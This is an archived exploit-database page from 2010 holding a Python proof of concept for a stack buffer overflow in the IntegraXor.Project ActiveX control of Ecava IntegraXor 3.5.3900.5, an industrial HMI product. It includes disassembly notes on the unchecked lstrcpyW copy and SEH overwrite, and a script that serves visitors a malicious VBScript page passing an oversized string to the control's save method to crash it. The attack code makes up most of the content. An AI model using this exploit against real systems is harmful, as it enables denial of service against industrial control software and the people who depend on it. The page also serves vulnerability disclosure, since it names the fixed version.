[dos / poc] - Ecava IntegraXor Remote ActiveX Buffer Overflo
Posted on 18 December 2010
<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Strict//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd'><html xmlns='http://www.w3.org/1999/xhtml'><head><meta http-equiv='Content-Type' content='text/html; charset=utf-8' /><meta http-equiv='Content-Language' content='en' /><title>Ecava IntegraXor Remote ActiveX Buffer Overflow PoC | Inj3ct0r - exploit database : vulnerability : 0day : shellcode</title><meta name='description' content='Ecava IntegraXor Remote ActiveX Buffer Overflow PoC by Jeremy Brown in dos / poc | Inj3ct0r 1337 - exploit database : vulnerability : 0day : shellcode' /><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon' /><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss' /><script type='text/javascript'>var _gaq = _gaq || [];_gaq.push(["_setAccount", "UA-12725838-1"]);_gaq.push(["_setDomainName", "none"]);_gaq.push(["_setAllowLinker", true]);_gaq.push(["_trackPageview"]);(function(){var ga = document.createElement("script"); ga.type = "text/javascript"; ga.async = true;ga.src = ("https:" == document.location.protocol ? "https://ssl" : "http://www") + ".google-analytics.com/ga.js";var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(ga, s);})();</script></head><body><pre>=================================================== Ecava IntegraXor Remote ActiveX Buffer Overflow PoC =================================================== #!/usr/bin/python # intx.py # Ecava IntegraXor Remote ActiveX Buffer Overflow PoC # Jeremy Brown # December 2010 # http://www.integraxor.com/ # # There is a stack-based buffer overflow in IntegraXor that can be triggered # by passing an overly large value to the "save" method of the IntegraXor.Project # control located in igcomm.dll. This control is marked both safe for scripting # and safe for initialization. # # .text:100027C1 push eax ; lpString2 # .text:100027C2 lea eax, [esp+84Ch+String1] # .text:100027C6 push eax ; lpString1 # .text:100027C7 call ds:lstrcpyW # .text:100027CD lea ecx, [esp+848h+String1] # .text:100027D1 push ecx # .text:100027D2 call SplitPath # .text:100027D7 add esp, 4 # .text:100027DA lea ecx, [esp+848h+var_83C] # .text:100027DE call ds:??0?$basic_string@_WU?$char<truncated> # .text:100027E4 cmp dword ptr [esi+20h], 8 # .text:100027E8 jb short loc_100027EF # .text:100027EA mov esi, [esi+0Ch] # .text:100027ED jmp short loc_100027F2 # # The vulnerable code in this block passes String1 (dest) and lpString2 (src) # to lstrcpyW() without validating the length of lpString2. lstrcpyW() then # copies lpString2 byte for byte into String1 (1024 bytes wchar buffer) and # adds a terminating NULL byte to the end. # # If you attach a debugger and set a breakpoint on 100027CD, you can see an # exception registration record is stored before the return address: # # ESP+83C > 00420042 B.B. Pointer to next SEH record # ESP+840 > 00420042 B.B. SE handler # ESP+844 > FFFF0000 ..�� # ESP+848 > 10007916 xxxx RETURN to igcom.10007916 from igcom.10002770 # # I wasn't able to find any useable unicode compatible PPRs. We can overwrite # the return address, but it will exit with a c0000409 code (/GS exception). # # Tested Ecava IntegraXor 3.5.3900.5 on Windows # # Fixed version: 3.5.3900.10 # import sys import socket resp=""" <html> <body> <object id="target" classid="clsid:{520F4CFD-61C6-4EED-8004-C26D514D3D19}"></object> <script language="vbscript"> data="IntegraXor" filepath=String(1038,"B") target.save data,filepath </script> </body> </html> """ port=80 try: sock=socket.socket(socket.AF_INET,socket.SOCK_STREAM) sock.bind(("",port)) sock.listen(1) conn,addr=sock.accept() except IOError,e: print e print "Client at %s connected "%addr[0] req=conn.recv(1024) print "Sending data..." conn.send(resp) print "Done" conn.close() # <a href='http://1337db.com/'>1337db.com</a> [2010-12-18]</pre></body></html>
